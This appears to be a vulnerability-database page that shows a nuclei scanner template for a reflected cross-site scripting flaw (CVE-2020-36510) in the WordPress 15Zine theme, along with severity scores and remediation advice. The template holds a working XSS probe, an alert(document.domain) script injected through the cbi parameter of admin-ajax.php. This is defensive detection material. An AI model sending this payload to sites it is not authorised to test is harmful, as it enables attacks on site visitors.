Lucene search
K

WordPress 15Zine <3.3.0 - Cross-Site Scripting

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

WordPress 15Zine <3.3.0 - Cross-Site Scripting vulnerability, impact, and remediatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 跨站脚本漏洞
28 Feb 202200:00
cnnvd
CNVD
WordPress 15Zine cross-site scripting vulnerability
4 Mar 202200:00
cnvd
CVE
CVE-2020-36510
28 Feb 202209:06
cve
Cvelist
CVE-2020-36510 15Zine < 3.3.0 - Reflected Cross-Site Scripting
28 Feb 202209:06
cvelist
EUVD
EUVD-2020-23992
7 Oct 202500:30
euvd
NVD
CVE-2020-36510
28 Feb 202209:15
nvd
OSV
CVE-2020-36510
28 Feb 202209:15
osv
Patchstack
WordPress 15zine premium theme <= 3.2.2 - Reflected Cross-Site Scripting (XSS) vulnerability
21 Sep 202000:00
patchstack
Prion
Cross site scripting
28 Feb 202209:15
prion
RedhatCVE
CVE-2020-36510
22 May 202515:34
redhatcve
Rows per page
id: CVE-2020-36510

info:
  name: WordPress 15Zine <3.3.0 - Cross-Site Scripting
  author: veshraj
  severity: medium
  description: |
    WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36510
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-36510
    cwe-id: CWE-79
    epss-score: 0.02602
    epss-percentile: 0.83522
    cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "false"
    max-request: 2
    vendor: codetipi
    product: 15zine
    framework: wordpress
  tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/themes/15zine/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/15zine/assets/'

  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022057a4744330cf5247079cc4cc09f80b65c66592ce5360de8e3ddde017be85995a022100dd8c73ef863d85aa47a9221a6a8742c8976b539268a2e98a43e07914d2fefd74:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.02602
21